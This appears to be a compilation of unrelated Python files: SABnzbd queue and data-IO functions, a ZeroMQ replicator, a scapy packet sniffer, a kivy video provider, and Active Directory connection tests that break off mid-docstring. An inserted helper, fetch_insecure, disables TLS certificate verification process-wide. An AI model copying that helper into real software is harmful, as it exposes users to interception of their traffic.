logging.debug("PAUSED_ALL inactive") ############################################################################## # NZB Saving Methods ############################################################################## def backup_exists(filename: str) -> bool: """Return True if backup exists and no_dupes is set""" path = cfg.nzb_backup_dir.get_path() return path and os.path.exists(os.path.join(path, filename + ".gz")) def backup_nzb(filename: str, data: AnyStr): """Backup NZB file""" path = cfg.nzb_backup_dir.get_path() if path: save_compressed(path, filename, data) def save_compressed(folder: str, filename: str, data: AnyStr): """Save compressed NZB file in folder""" if filename.endswith(".nzb"): filename += ".gz" else: filename += ".nzb.gz" logging.info("Backing up %s", os.path.join(folder, filename)) try: # Have to get around the path being put inside the tgz with open(os.path.join(folder, filename), "wb") as tgz_file: f = gzip.GzipFile(filename, fileobj=tgz_file, mode="wb") f.write(encoding.utob(data)) f.flush() f.close() except: logging.error(T("Saving %s failed"), os.path.join(folder, filename)) logging.info("Traceback: ", exc_info=True) ############################################################################## # Unsynchronized methods ############################################################################## def add_nzbfile( nzbfile: Union[str, cherrypy._cpreqbody.Part], pp: Optional[Union[int, str]] = None, script: Optional[str] = None, cat: Optional[str] = None, catdir: Optional[str] = None, priority: Optional[Union[int, str]] = DEFAULT_PRIORITY, nzbname: Optional[str] = None, nzo_info=None, url: Optional[str] = None, keep: Optional[bool] = None, reuse: Optional[str] = None, password: Optional[str] = 
None, nzo_id: Optional[str] = None, ): """Add file, either a single NZB-file or an archive. All other parameters are passed to the NZO-creation. """ if pp == "-1": pp = None if script and (script.lower() == "default" or not filesystem.is_valid_script(script)): script = None if cat and cat.lower() == "default": cat = None if isinstance(nzbfile, str): # File coming from queue repair or local file-path path = nzbfile filename = os.path.basename(path) keep_default = True if not sabnzbd.WIN32: # If windows client sends file to Unix server backslashes may # be included, so convert these path = path.replace("\\", "/") logging.info("Attempting to add %s [%s]", filename, path) else: # File from file-upload object # CherryPy mangles unicode-filenames: https://github.com/cherrypy/cherrypy/issues/1766 filename = encoding.correct_unknown_encoding(nzbfile.filename) logging.info("Attempting to add %s", filename) keep_default = False try: # We have to create a copy, because we can't re-use the CherryPy temp-file # Just to be sure we add the extension to detect file type later on nzb_temp_file, path = tempfile.mkstemp(suffix=filesystem.get_ext(filename)) os.write(nzb_temp_file, nzbfile.file.read()) os.close(nzb_temp_file) except OSError: logging.error(T("Cannot create temp file for %s"), filename) logging.info("Traceback: ", exc_info=True) return None # Externally defined if we should keep the file? if keep is None: keep = keep_default if filesystem.get_ext(filename) in VALID_ARCHIVES: return nzbparser.process_nzb_archive_file( filename, path=path, pp=pp, script=script, cat=cat, catdir=catdir, priority=priority, nzbname=nzbname, keep=keep, reuse=reuse, nzo_info=nzo_info, url=url, password=password, nzo_id=nzo_id, ) else: return nzbparser.process_single_nzb( filename, path=path, pp=pp, script=script, cat=cat, catdir=catdir, priority=priority, nzbname=nzbname, keep=keep, reuse=reuse, nzo_info=nzo_info, url=url, password=password, nzo_id=nzo_id, ) def enable_server(server): """Enable server (scheduler only)""" try: config.get_config("servers", server).enable.set(1) except: logging.warning(T("Trying to set status of non-existing server %s"), server) return config.save_config() sabnzbd.Downloader.update_server(server, server) def disable_server(server): """Disable server (scheduler only)""" try: config.get_config("servers", server).enable.set(0) except: logging.warning(T("Trying to set status of non-existing server %s"), server) return config.save_config() sabnzbd.Downloader.update_server(server, server) def system_shutdown(): """Shutdown system after halting download and saving bookkeeping""" logging.info("Performing system shutdown") Thread(target=halt).start() while __INITIALIZED__: time.sleep(1.0) if sabnzbd.WIN32: powersup.win_shutdown() elif DARWIN: powersup.osx_shutdown() else: powersup.linux_shutdown() def system_hibernate(): """Hibernate system""" logging.info("Performing system hybernation") if sabnzbd.WIN32: powersup.win_hibernate() elif DARWIN: powersup.osx_hibernate() else: powersup.linux_hibernate() def system_standby(): """Standby system""" logging.info("Performing system standby") if sabnzbd.WIN32: powersup.win_standby() elif DARWIN: powersup.osx_standby() else: powersup.linux_standby() def restart_program(): """Restart program (used by scheduler)""" logging.info("Scheduled restart request") # Just set the stop flag, because stopping CherryPy from # the scheduler is not reliable sabnzbd.TRIGGER_RESTART = True def change_queue_complete_action(action, new=True): """Action or script to be performed 
once the queue has been completed Scripts are prefixed with 'script_' When "new" is False, check whether non-script actions are acceptable """ _action = None _argument = None if action.startswith("script_") and filesystem.is_valid_script(action.replace("script_", "", 1)): # all scripts are labeled script_xxx _action = run_script _argument = action.replace("script_", "", 1) elif new or cfg.queue_complete_pers(): if action == "shutdown_pc": _action = system_shutdown elif action == "hibernate_pc": _action = system_hibernate elif action == "standby_pc": _action = system_standby elif action == "shutdown_program": _action = shutdown_program else: action = None else: action = None if new: cfg.queue_complete.set(action or "") config.save_config() sabnzbd.QUEUECOMPLETE = action sabnzbd.QUEUECOMPLETEACTION = _action sabnzbd.QUEUECOMPLETEARG = _argument def run_script(script): """Run a user script (queue complete only)""" script_path = filesystem.make_script_path(script) if script_path: try: script_output = misc.run_command([script_path]) logging.info("Output of queue-complete script %s: \n%s", script, script_output) except: logging.info("Failed queue-complete script %s, Traceback: ", script, exc_info=True) def keep_awake(): """If we still have work to do, keep Windows/macOS system awake""" if KERNEL32 or FOUNDATION: if sabnzbd.cfg.keep_awake(): ES_CONTINUOUS = 0x80000000 ES_SYSTEM_REQUIRED = 0x00000001 if (not sabnzbd.Downloader.is_paused() and not sabnzbd.NzbQueue.is_empty()) or ( not sabnzbd.PostProcessor.paused and not sabnzbd.PostProcessor.empty() ): if KERNEL32: # Set ES_SYSTEM_REQUIRED until the next call KERNEL32.SetThreadExecutionState(ES_CONTINUOUS | ES_SYSTEM_REQUIRED) else: sleepless.keep_awake("SABnzbd is busy downloading and/or post-processing") else: if KERNEL32: # Allow the regular state again KERNEL32.SetThreadExecutionState(ES_CONTINUOUS) else: sleepless.allow_sleep() ################################################################################ # Data IO # ################################################################################ def get_new_id(prefix, folder, check_list=None): """Return unique prefixed admin identifier within folder optionally making sure that id is not in the check_list. 
""" for n in range(100): try: if not os.path.exists(folder): os.makedirs(folder) fd, path = tempfile.mkstemp("", "SABnzbd_%s_" % prefix, folder) os.close(fd) head, tail = os.path.split(path) if not check_list or tail not in check_list: return tail except: logging.error(T("Failure in tempfile.mkstemp")) logging.info("Traceback: ", exc_info=True) break # Cannot create unique id, crash the process raise IOError def save_data(data, _id, path, do_pickle=True, silent=False): """Save data to a diskfile""" if not silent: logging.debug("[%s] Saving data for %s in %s", misc.caller_name(), _id, path) path = os.path.join(path, _id) # We try 3 times, to avoid any dict or access problems for t in range(3): try: with open(path, "wb") as data_file: if do_pickle: pickle.dump(data, data_file, protocol=pickle.HIGHEST_PROTOCOL) else: data_file.write(data) break except: if silent: # This can happen, probably a removed folder pass elif t == 2: logging.error(T("Saving %s failed"), path) logging.info("Traceback: ", exc_info=True) else: # Wait a tiny bit before trying again time.sleep(0.1) def load_data(data_id, path, remove=True, do_pickle=True, silent=False): """Read data from disk file""" path = os.path.join(path, data_id) if not os.path.exists(path): logging.info("[%s] %s missing", misc.caller_name(), path) return None if not silent: logging.debug("[%s] Loading data for %s from %s", misc.caller_name(), data_id, path) try: with open(path, "rb") as data_file: if do_pickle: try: data = pickle.load(data_file, encoding=sabnzbd.encoding.CODEPAGE) except UnicodeDecodeError: # Could be Python 2 data that we can load using old encoding data = pickle.load(data_file, encoding="latin1") else: data = data_file.read() if remove: filesystem.remove_file(path) except: logging.error(T("Loading %s failed"), path) logging.info("Traceback: ", exc_info=True) return None return data def remove_data(_id: str, path: str): """Remove admin file""" path = os.path.join(path, _id) try: if os.path.exists(path): filesystem.remove_file(path) except: logging.debug("Failed to remove %s", path) def save_admin(data: Any, data_id: str): """Save data in admin folder in specified format""" logging.debug("[%s] Saving data for %s", misc.caller_name(), data_id) save_data(data, data_id, cfg.admin_dir.get_path()) def load_admin(data_id: str, remove=False, silent=False) -> Any: """Read data in admin folder in specified format""" logging.debug("[%s] Loading data for %s", misc.caller_name(), data_id) return load_data(data_id, cfg.admin_dir.get_path(), remove=remove, silent=silent) def request_repair(): """Request a full repair on next restart""" path = os.path.join(cfg.admin_dir.get_path(), REPAIR_REQUEST) try: with open(path, "w") as f: f.write("\n") except: pass def check_repair_request(): """Return True if repair request found, remove afterwards""" path = os.path.join(cfg.admin_dir.get_path(), REPAIR_REQUEST) if os.path.exists(path): try: filesystem.remove_file(path) except: pass return True return False def check_all_tasks(): """Check every task and restart safe ones, else restart program Return True when everything is under control """ if __SHUTTING_DOWN__ or not __INITIALIZED__: return True # Non-restartable threads, require program restart if not sabnzbd.PostProcessor.is_alive(): logging.warning(T("Restarting because of crashed postprocessor")) return False if not sabnzbd.Downloader.is_alive(): logging.warning(T("Restarting because of crashed downloader")) return False if not sabnzbd.Decoder.is_alive(): logging.warning(T("Restarting because of 
crashed decoder")) return False if not sabnzbd.Assembler.is_alive(): logging.warning(T("Restarting because of crashed assembler")) return False # Kick the downloader, in case it missed the semaphore sabnzbd.Downloader.wakeup() # Make sure the right servers are active sabnzbd.Downloader.check_timers() # Restartable threads if not sabnzbd.DirScanner.is_alive(): logging.info("Restarting crashed dirscanner") sabnzbd.DirScanner.__init__() if not sabnzbd.URLGrabber.is_alive(): logging.info("Restarting crashed urlgrabber") sabnzbd.URLGrabber.__init__() if not sabnzbd.Rating.is_alive(): logging.info("Restarting crashed rating") sabnzbd.Rating.__init__() if not sabnzbd.Scheduler.is_alive(): logging.info("Restarting crashed scheduler") sabnzbd.Scheduler.restart() sabnzbd.Downloader.unblock_all() # Check one-shot pause sabnzbd.Scheduler.pause_check() # Check (and terminate) idle jobs sabnzbd.NzbQueue.stop_idle_jobs() return True def pid_file(pid_path=None, pid_file=None, port=0): """Create or remove pid file""" if not sabnzbd.WIN32: if pid_path and pid_path.startswith("/"): sabnzbd.DIR_PID = os.path.join(pid_path, "sabnzbd-%d.pid" % port) elif pid_file and pid_file.startswith("/"): sabnzbd.DIR_PID = pid_file if sabnzbd.DIR_PID: try: if port: with open(sabnzbd.DIR_PID, "w") as f: f.write("%d\n" % os.getpid()) else: filesystem.remove_file(sabnzbd.DIR_PID) except: logging.warning(T("Cannot access PID file %s"), sabnzbd.DIR_PID) def check_incomplete_vs_complete(): """Make sure download_dir and complete_dir are not identical or that download_dir is not a subfolder of complete_dir""" complete = cfg.complete_dir.get_path() if filesystem.same_file(cfg.download_dir.get_path(), complete): if filesystem.real_path("X", cfg.download_dir()) == filesystem.long_path(cfg.download_dir()): # Abs path, so set download_dir as an abs path inside the complete_dir cfg.download_dir.set(os.path.join(complete, "incomplete")) else: cfg.download_dir.set("incomplete") return False return True def wait_for_download_folder(): """Wait for download folder to become available""" while not cfg.download_dir.test_path(): logging.debug('Waiting for "incomplete" folder') time.sleep(2.0) def test_ipv6(): """Check if external IPv6 addresses are reachable""" if not cfg.selftest_host(): # User disabled the test, assume active IPv6 return True try: info = sabnzbd.getipaddress.addresslookup6(cfg.selftest_host()) except: logging.debug( "Test IPv6: Disabling IPv6, because it looks like it's not available. Reason: %s", sys.exc_info()[0] ) return False try: af, socktype, proto, canonname, sa = info[0] with socket.socket(af, socktype, proto) as sock: sock.settimeout(2) # 2 second timeout sock.connect(sa[0:2]) logging.debug("Test IPv6: IPv6 test successful. Enabling IPv6") return True except socket.error: logging.debug("Test IPv6: Cannot reach IPv6 test host. Disabling IPv6") return False except: logging.debug("Test IPv6: Problem during IPv6 connect. Disabling IPv6. Reason: %s", sys.exc_info()[0]) return False def test_cert_checking(): """Test quality of certificate validation""" # User disabled the test, assume proper SSL certificates if not cfg.selftest_host(): return True # Try a connection to our test-host try: ctx = ssl.create_default_context() base_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) ssl_sock = ctx.wrap_socket(base_sock, server_hostname=cfg.selftest_host()) ssl_sock.settimeout(2.0) ssl_sock.connect((cfg.selftest_host(), 443)) ssl_sock.close() return True except (socket.gaierror, socket.timeout): # Non-SSL related error. 
# We now assume that certificates work instead of forcing # lower quality just because of some (temporary) internet problem logging.info("Could not determine system certificate validation quality due to connection problems") return True except: # Seems something is still wrong sabnzbd.set_https_verification(False) return False def history_updated(): """To make sure we always have a fresh history""" sabnzbd.LAST_HISTORY_UPDATE += 1 # Never go over the limit if sabnzbd.LAST_HISTORY_UPDATE + 1 >= sys.maxsize: sabnzbd.LAST_HISTORY_UPDATE = 1
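# --- Editor's illustrative sketch (not part of SABnzbd) -----------------------
# set_https_verification() above works by swapping the module-level factory that
# the standard library consults when it builds a default HTTPS context. This
# minimal, self-contained sketch shows the same toggle around a single request;
# the URL argument and the fetch_insecure() helper are assumptions made purely
# for illustration.
import ssl
import urllib.request


def fetch_insecure(url):
    """Fetch a URL with certificate verification temporarily disabled."""
    previous = ssl._create_default_https_context
    ssl._create_default_https_context = ssl._create_unverified_context
    try:
        with urllib.request.urlopen(url, timeout=10) as response:
            return response.read()
    finally:
        # Restore the previous factory so the rest of the process keeps
        # verifying certificates as before.
        ssl._create_default_https_context = previous
# ------------------------------------------------------------------------------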
replicatorsrc.py
import sys
sys.path.append("../")

from threading import Thread

from common.zmqHelper import zhelper
from common.util import readVideo
import zmq
import progressbar
from appconfig import KEEPERS_TO_KEEPERS_REPL_PORT as KEEPERS_TO_KEEPERS_PORT, TRACKER_IP, TRACKER_PORTS


class ReplicatorSrc:
    def __init__(self, port):
        # self.trackerSocket = zhelper.newSocket()
        self.mysocket = zhelper.newServerSocket(zmq.REP, "*", port)

    def handleTrackerRequest(self):
        request = self.mysocket.recv_json()
        print("received a request:", request)
        self.file, destinations = request.get("file"), request.get("dests")
        threads = []
        for dest in destinations:
            t = Thread(target=self.replicate, args=(dest,))
            threads.append(t)
            t.start()
        for t in threads:
            t.join()
        print("sending to the tracker to continue replication")
        # ACK to the replicator process in the tracker to continue processing
        self.mysocket.send_string("ACK")

    def replicate(self, dest):
        f = self.file
        print(f, dest)
        port = KEEPERS_TO_KEEPERS_PORT
        keeperSocket = zhelper.newSocket(zmq.REQ, dest["nodeIP"], (port,))
        uploader = Uploader()
        uploader.upload(keeperSocket, f["userID"], f["fileName"])


# OPTIMIZE TODO: remove this class and add a general uploader in the common dir
#                that can handle both the client and the replicator
# OPTIMIZE TODO: read the file only once, before opening the threads
class Uploader:
    def __init__(self):
        pass

    def upload(self, socket, username, filename):
        data = readVideo(f"{username}/{filename}")
        payload = {
            "function": "upload",
            "username": username,
            "filename": filename,
            "numChunks": len(data),
        }
        socket.send_json(payload)
        socket.recv()
        print("uploading start")
        with progressbar.ProgressBar(max_value=len(data)) as bar:
            for i in range(len(data)):
                socket.send(data[i])
                socket.recv()
                bar.update(i)


def main(port):
    replicator = ReplicatorSrc(port)
    while True:
        replicator.handleTrackerRequest()  #? TODO: should we sleep here


if __name__ == "__main__":
    from appconfig import TRACKER_TO_KEEPERS_PORTS

    port = TRACKER_TO_KEEPERS_PORTS[0]
    if len(sys.argv) >= 2:
        port = sys.argv[1]
    main(port)
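# --- Editor's illustrative sketch (not part of replicatorsrc.py) --------------
# A minimal counterpart to Uploader.upload() above: the receiving keeper side of
# the chunked REQ/REP protocol, written with plain pyzmq instead of the project's
# zhelper wrapper. The port number, the run_keeper() name and the output file
# naming are assumptions made for illustration only.
import zmq


def run_keeper(port=6000):
    context = zmq.Context.instance()
    socket = context.socket(zmq.REP)
    socket.bind("tcp://*:%s" % port)
    while True:
        # Header: {"function": "upload", "username": ..., "filename": ..., "numChunks": N}
        header = socket.recv_json()
        socket.send(b"ACK")  # unblocks the uploader's first recv()
        chunks = []
        for _ in range(header["numChunks"]):
            chunks.append(socket.recv())  # one chunk per REQ/REP round-trip
            socket.send(b"ACK")
        with open("%s_%s" % (header["username"], header["filename"]), "wb") as out:
            out.write(b"".join(chunks))
# ------------------------------------------------------------------------------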
packet_capture.py
""" Thread that continuously captures and processes packets. """ import scapy.all as sc import threading import time from host_state import HostState import utils class PacketCapture(object): def __init__(self, host_state): assert isinstance(host_state, HostState) self._host_state = host_state self._lock = threading.Lock() self._active = True self._thread = threading.Thread(target=self._capture_packets) self._thread.daemon = True def start(self): with self._lock: self._active = True utils.log('[Packet Capture] Starting.') self._thread.start() def _capture_packets(self): while self._is_active(): if not self._host_state.is_inspecting(): time.sleep(2) continue result = utils.safe_run(sc.sniff, kwargs={ 'prn': self._host_state.packet_processor.process_packet, 'stop_filter': lambda _: not self._is_active() or not self._host_state.is_inspecting(), 'timeout': 30, 'iface': "lan0" }) if isinstance(result, utils._SafeRunError): time.sleep(1) def _is_active(self): with self._lock: return self._active def stop(self): utils.log('[Packet Capture] Stopping.') with self._lock: self._active = False self._thread.join() utils.log('[Packet Capture] Stopped.')
video_ffpyplayer.py
'''
FFmpeg based video abstraction
==============================

To use, you need to install ffpyplayer and have a compiled ffmpeg shared
library.

    https://github.com/matham/ffpyplayer

The docs there describe how to set this up. But briefly, first you need to
compile ffmpeg using the shared flags while disabling the static flags (you'll
probably have to set the fPIC flag, e.g. CFLAGS=-fPIC). Here are some
instructions: https://trac.ffmpeg.org/wiki/CompilationGuide. For Windows, you
can download compiled GPL binaries from http://ffmpeg.zeranoe.com/builds/.
Similarly, you should download SDL.

Now, you should have an ffmpeg and an sdl directory. In each, you should have
an include, bin, and lib directory, where e.g. for Windows, lib contains the
.dll.a files, while bin contains the actual dlls. The include directory holds
the headers. The bin directory is only needed if the shared libraries are not
already on the path.

In the environment, define FFMPEG_ROOT and SDL_ROOT, each pointing to the
ffmpeg and SDL directories, respectively. (If you're using SDL2, the include
directory will contain a directory called SDL2, which then holds the headers.)

Once defined, download the ffpyplayer git repository and run

    python setup.py build_ext --inplace

Finally, before running you need to ensure that ffpyplayer is in python's path.

.. Note::

    When kivy exits by closing the window while the video is playing, it
    appears that the __del__ method of VideoFFPy is not called. Because of this
    the VideoFFPy object is not properly deleted when kivy exits. The
    consequence is that because MediaPlayer creates internal threads which do
    not have their daemon flag set, when the main thread exits it'll hang and
    wait for the other MediaPlayer threads to exit. But since __del__ is not
    called to delete the MediaPlayer object, those threads will remain alive,
    hanging kivy. What this means is that you have to be sure to delete the
    MediaPlayer object before kivy exits by setting it to None.
''' __all__ = ('VideoFFPy', ) try: import ffpyplayer from ffpyplayer.player import MediaPlayer from ffpyplayer.tools import set_log_callback, get_log_callback except: raise from threading import Thread from kivy.clock import Clock, mainthread from kivy.logger import Logger from kivy.core.video import VideoBase from kivy.graphics import Rectangle, BindTexture from kivy.graphics.texture import Texture from kivy.graphics.fbo import Fbo from kivy.weakmethod import WeakMethod import time Logger.info('VideoFFPy: Using ffpyplayer {}'.format(ffpyplayer.version)) logger_func = {'quiet': Logger.critical, 'panic': Logger.critical, 'fatal': Logger.critical, 'error': Logger.error, 'warning': Logger.warning, 'info': Logger.info, 'verbose': Logger.debug, 'debug': Logger.debug} def _log_callback(message, level): message = message.strip() if message: logger_func[level]('ffpyplayer: {}'.format(message)) if not get_log_callback(): set_log_callback(_log_callback) class VideoFFPy(VideoBase): YUV_RGB_FS = """ $HEADER$ uniform sampler2D tex_y; uniform sampler2D tex_u; uniform sampler2D tex_v; void main(void) { float y = texture2D(tex_y, tex_coord0).r; float u = texture2D(tex_u, tex_coord0).r - 0.5; float v = texture2D(tex_v, tex_coord0).r - 0.5; float r = y + 1.402 * v; float g = y - 0.344 * u - 0.714 * v; float b = y + 1.772 * u; gl_FragColor = vec4(r, g, b, 1.0); } """ def __init__(self, **kwargs): self._ffplayer = None self._thread = None self._next_frame = None self._ffplayer_need_quit = False self._callback_ref = WeakMethod(self._player_callback) self._trigger = Clock.create_trigger(self._redraw) super(VideoFFPy, self).__init__(**kwargs) def __del__(self): self.unload() def _player_callback(self, selector, value): if self._ffplayer is None: return if selector == 'quit': def close(*args): self.unload() Clock.schedule_once(close, 0) def _get_position(self): if self._ffplayer is not None: return self._ffplayer.get_pts() return 0 def _set_position(self, pos): self.seek(pos) def _set_volume(self, volume): self._volume = volume if self._ffplayer: self._ffplayer.set_volume(self._volume) def _get_duration(self): if self._ffplayer is None: return 0 return self._ffplayer.get_metadata()['duration'] @mainthread def _do_eos(self): if self.eos == 'pause': self.pause() elif self.eos == 'stop': self.stop() elif self.eos == 'loop': self.position = 0 self.dispatch('on_eos') @mainthread def _change_state(self, state): self._state = state def _redraw(self, *args): if not self._ffplayer: return next_frame = self._next_frame if not next_frame: return img, pts = next_frame if img.get_size() != self._size or self._texture is None: self._size = w, h = img.get_size() if self._out_fmt == 'yuv420p': w2 = int(w / 2) h2 = int(h / 2) self._tex_y = Texture.create( size=(w, h), colorfmt='luminance') self._tex_u = Texture.create( size=(w2, h2), colorfmt='luminance') self._tex_v = Texture.create( size=(w2, h2), colorfmt='luminance') self._fbo = fbo = Fbo(size=self._size) with fbo: BindTexture(texture=self._tex_u, index=1) BindTexture(texture=self._tex_v, index=2) Rectangle(size=fbo.size, texture=self._tex_y) fbo.shader.fs = VideoFFPy.YUV_RGB_FS fbo['tex_y'] = 0 fbo['tex_u'] = 1 fbo['tex_v'] = 2 self._texture = fbo.texture else: self._texture = Texture.create(size=self._size, colorfmt='rgba') # XXX FIXME #self.texture.add_reload_observer(self.reload_buffer) self._texture.flip_vertical() self.dispatch('on_load') if self._texture: if self._out_fmt == 'yuv420p': dy, du, dv, _ = img.to_memoryview() self._tex_y.blit_buffer(dy, 
colorfmt='luminance') self._tex_u.blit_buffer(du, colorfmt='luminance') self._tex_v.blit_buffer(dv, colorfmt='luminance') else: self._texture.blit_buffer( img.to_memoryview()[0], colorfmt='rgba') self._fbo.ask_update() self._fbo.draw() self.dispatch('on_frame') def _next_frame_run(self): ffplayer = self._ffplayer sleep = time.sleep trigger = self._trigger did_dispatch_eof = False # fast path, if the source video is yuv420p, we'll use a glsl shader for # buffer conversion to rgba while not self._ffplayer_need_quit: src_pix_fmt = ffplayer.get_metadata().get('src_pix_fmt') if not src_pix_fmt: sleep(0.005) continue if src_pix_fmt == 'yuv420p': self._out_fmt = 'yuv420p' ffplayer.set_output_pix_fmt(self._out_fmt) self._ffplayer.toggle_pause() break if self._ffplayer_need_quit: return # wait until loaded or failed, shouldn't take long, but just to make # sure metadata is available. s = time.clock() while not self._ffplayer_need_quit: if ffplayer.get_metadata()['src_vid_size'] != (0, 0): break # XXX if will fail later then? if time.clock() - s > 10.: break sleep(0.005) if self._ffplayer_need_quit: return # we got all the informations, now, get the frames :) self._change_state('playing') while not self._ffplayer_need_quit: t1 = time.time() frame, val = ffplayer.get_frame() t2 = time.time() if val == 'eof': sleep(0.2) if not did_dispatch_eof: self._do_eos() did_dispatch_eof = True elif val == 'paused': did_dispatch_eof = False sleep(0.2) else: did_dispatch_eof = False if frame: self._next_frame = frame trigger() else: val = val if val else (1 / 30.) sleep(val) def seek(self, percent): if self._ffplayer is None: return self._ffplayer.seek(percent * self._ffplayer.get_metadata() ['duration'], relative=False) self._next_frame = None def stop(self): self.unload() def pause(self): if self._ffplayer and self._state != 'paused': self._ffplayer.toggle_pause() self._state = 'paused' def play(self): if self._ffplayer and self._state == 'paused': self._ffplayer.toggle_pause() self._state = 'playing' return self.load() self._out_fmt = 'rgba' ff_opts = { 'paused': True, 'out_fmt': self._out_fmt } self._ffplayer = MediaPlayer( self._filename, callback=self._callback_ref, thread_lib='SDL', loglevel='info', ff_opts=ff_opts) self._ffplayer.set_volume(self._volume) self._thread = Thread(target=self._next_frame_run, name='Next frame') self._thread.daemon = True self._thread.start() def load(self): self.unload() def unload(self): Clock.unschedule(self._redraw) self._ffplayer_need_quit = True if self._thread: self._thread.join() self._thread = None if self._ffplayer: self._ffplayer = None self._next_frame = None self._size = (0, 0) self._state = '' self._ffplayer_need_quit = False
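# --- Editor's illustrative sketch (not part of the kivy provider) -------------
# The cleanup that the module docstring asks for: close and drop the MediaPlayer
# reference before the interpreter exits, so its internal non-daemon threads
# cannot keep the process alive. "video.mp4" is an assumed filename, and this
# drives ffpyplayer directly rather than through VideoFFPy.
import time

from ffpyplayer.player import MediaPlayer

player = MediaPlayer("video.mp4")
try:
    while True:
        frame, val = player.get_frame()
        if val == 'eof':
            break
        # get_frame() returns a suggested wait when no new frame is ready
        time.sleep(val if isinstance(val, float) else 1 / 30.)
finally:
    player.close_player()
    player = None  # drop the reference, as the note above recommends
# ------------------------------------------------------------------------------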
connection_test.py
import demistomock as demisto from Active_Directory_Query import main, group_dn import socket import ssl from threading import Thread import time import os import pytest import json from IAMApiModule import * from unittest.mock import patch BASE_TEST_PARAMS = { 'server_ip': '127.0.0.1', 'secure_connection': 'None', 'page_size': '500', 'credentials': {'identifier': 'bad', 'password': 'bad'} } RETURN_ERROR_TARGET = 'Active_Directory_Query.return_error' def test_bad_host_no_ssl(mocker): mocker.patch.object(demisto, 'params', return_value=BASE_TEST_PARAMS) return_error_mock = mocker.patch(RETURN_ERROR_TARGET) # validate our mock of params assert demisto.params().get('server_ip') == '127.0.0.1' main() assert return_error_mock.call_count == 1 # call_args last call with a tuple of args list and kwargs err_msg = return_error_mock.call_args[0][0] assert len(err_msg) < 100 assert 'Failed to access' in err_msg @pytest.mark.filterwarnings("ignore::ResourceWarning") def test_bad_ssl(mocker): params = BASE_TEST_PARAMS.copy() params['server_ip'] = '185.199.108.153' # disable-secrets-detection params['secure_connection'] = 'SSL' params['port'] = 443 mocker.patch.object(demisto, 'params', return_value=params) return_error_mock = mocker.patch(RETURN_ERROR_TARGET) demisto_info_mock = mocker.patch.object(demisto, "info") # validate our mock of params assert demisto.params().get('secure_connection') == 'SSL' main() assert return_error_mock.call_count == 1 # call_args last call with a tuple of args list and kwargs err_msg = return_error_mock.call_args[0][0] assert len(err_msg) < 100 assert 'Failed to access' in err_msg assert 'SSL error' in err_msg # call_args_list holds all calls (we need the first) with a tuple of args list and kwargs info_msg = demisto_info_mock.call_args_list[0][0][0] # ip is not in the certificate. so it should fail on host match assert "doesn't match any name" in info_msg def ssl_bad_socket_server(port): context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER) # cert and keyfile generated with # openssl req -x509 -nodes -days 3000 -newkey rsa:2048 -keyout key.pem -out cert.pem try: context.load_cert_chain('cert.pem', 'key.pem') with socket.socket(socket.AF_INET, socket.SOCK_STREAM, 0) as sock: sock.bind(('127.0.0.1', port)) sock.listen(5) with context.wrap_socket(sock, server_side=True) as ssock: try: conn, addr = ssock.accept() except ssl.SSLError as err: if 'TLSV1_ALERT_UNKNOWN_CA' in str(err): # all is ok. 
client refused our cert return raise conn.recv(32) msg = b'THIS IS A TEST SERVER WHICH IGNORES PROTOCOL\n\n' for x in range(10): msg += msg conn.send(msg) conn.shutdown(socket.SHUT_RDWR) conn.close() except Exception as ex: pytest.fail("Failed starting ssl_bad_socket_server: {}".format(ex)) raise @pytest.mark.filterwarnings("ignore::ResourceWarning") def test_faulty_server(mocker): port = 9638 t = Thread(target=ssl_bad_socket_server, args=(port,)) t.start() time.sleep(1) # wait for socket server to startup params = BASE_TEST_PARAMS.copy() params['server_ip'] = '127.0.0.1' # disable-secrets-detection params['secure_connection'] = 'SSL' params['unsecure'] = True params['port'] = port mocker.patch.object(demisto, 'params', return_value=params) return_error_mock = mocker.patch(RETURN_ERROR_TARGET) # validate our mock of params assert demisto.params().get('secure_connection') == 'SSL' main() t.join(5) assert return_error_mock.call_count == 1 # call_args last call with a tuple of args list and kwargs err_msg = return_error_mock.call_args[0][0] assert len(err_msg) < 100 assert 'Failed to access' in err_msg def test_ssl_custom_cert(mocker, request): ENV_KEY = 'SSL_CERT_FILE' os.environ[ENV_KEY] = 'cert.pem' def cleanup(): os.environ.pop(ENV_KEY) request.addfinalizer(cleanup) port = 9637 t = Thread(target=ssl_bad_socket_server, args=(port,)) t.start() time.sleep(1) # wait for socket server to startup params = BASE_TEST_PARAMS.copy() params['server_ip'] = '127.0.0.1' # disable-secrets-detection params['secure_connection'] = 'SSL' params['port'] = port mocker.patch.object(demisto, 'params', return_value=params) return_error_mock = mocker.patch(RETURN_ERROR_TARGET) # validate our mock of params assert demisto.params().get('secure_connection') == 'SSL' main() t.join(5) assert return_error_mock.call_count == 1 # call_args last call with a tuple of args list and kwargs err_msg = return_error_mock.call_args[0][0] assert len(err_msg) < 100 assert 'Failed to access' in err_msg assert 'SSL error' not in err_msg def test_endpoint_entry(): """ Given: Custom attributes to filter the computer object entry. When: The function filters the computer object according to the custom attributes. Then: The function will return all the computer object entry because custom attributes contain '*'. """ from Active_Directory_Query import endpoint_entry custom_attributes_with_asterisk = endpoint_entry({'dn': 'dn', 'name': 'name', 'memberOf': 'memberOf'}, ['*']) assert custom_attributes_with_asterisk == {'Groups': 'memberOf', 'Hostname': 'name', 'ID': 'dn', 'Type': 'AD'} def get_outputs_from_user_profile(user_profile): entry_context = user_profile.to_entry() outputs = entry_context.get('Contents') return outputs def test_create_user_iam(mocker): """ Given: A valid user profile with valid mapping When: Running the `create_user_iam` command Then: The user was created successfully in AD. 
""" import Active_Directory_Query add_args, add_kwargs = [], {} class ConnectionMocker: entries = [] result = {'controls': {'1.2.840.113556.1.4.319': {'value': {'cookie': '<cookie>'}}}} def search(self, *args, **kwargs): return def add(self, *args, **kwargs): nonlocal add_args, add_kwargs add_args, add_kwargs = args, kwargs return True Active_Directory_Query.conn = ConnectionMocker() args = {"user-profile": json.dumps({"email": "[email protected]", "username": "test", "locationregion": "Americas"})} mocker.patch('Active_Directory_Query.check_if_user_exists_by_attribute', return_value=False) mocker.patch.object(IAMUserProfile, 'map_object', return_value={'cn': 'test', 'mail': '[email protected]', 'samaccountname': 'test', 'userPrincipalName': 'test', "ou": "OU=Americas,OU=Demisto"}) user_profile = Active_Directory_Query.create_user_iam('', args, 'mapper_out', '') outputs = get_outputs_from_user_profile(user_profile) assert outputs.get('action') == IAMActions.CREATE_USER assert outputs.get('success') is True assert outputs.get('active') is False assert outputs.get('email') == '[email protected]' def test_unseccsseful_create_user_iam_missing_ou(mocker): """ Given: A valid user profile with missing ou in the mapping 